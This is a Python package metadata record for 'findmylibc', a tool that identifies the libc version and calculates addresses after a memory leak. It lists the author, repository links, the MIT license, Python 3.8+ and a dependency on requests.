Metadata-Version: 2.3
Name: findmylibc
Version: 1.1.0
Summary: Get the specific libc version + calculated addresses after a memory leak
Project-URL: Homepage, https://github.com/omrina/FindMyLibc
Project-URL: Issues, https://github.com/omrina/FindMyLibc/issues
Author: Omri Nathanson
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Requires-Python: >=3.8
Requires-Dist: requests>=2.25.1
